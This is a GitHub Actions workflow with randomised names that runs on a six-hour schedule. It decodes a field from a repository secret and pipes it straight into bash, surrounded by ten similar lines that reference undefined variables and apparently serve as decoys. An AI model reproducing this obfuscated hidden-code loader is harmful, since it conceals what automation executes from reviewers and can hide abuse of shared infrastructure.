name: lwcanggou

on:
  workflow_dispatch:
  schedule:
    - cron: '23 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lwcanggou
        env:
          fstbj11290: ${{ secrets.fstbj11290 }}
        run: |
          echo $fstbj11290 | jq -r .cemgw32389 | /bin/bash
          echo $iqatb7735 | jq -r .kky3 | /bin/bash
          echo $rv9 | jq -r .fvnw5 | /bin/bash
          echo $v11 | jq -r .op223 | /bin/bash
          echo $m4757 | jq -r .svr47129 | /bin/bash
          echo $bsu8 | jq -r .il167 | /bin/bash
          echo $gz216 | jq -r .r5 | /bin/bash
          echo $jdnaz6936 | jq -r .bflk716 | /bin/bash
          echo $su28 | jq -r .iu35 | /bin/bash
          echo $dsxe89 | jq -r .mnc3 | /bin/bash
          echo $reowy87629 | jq -r .hey42180 | /bin/bash

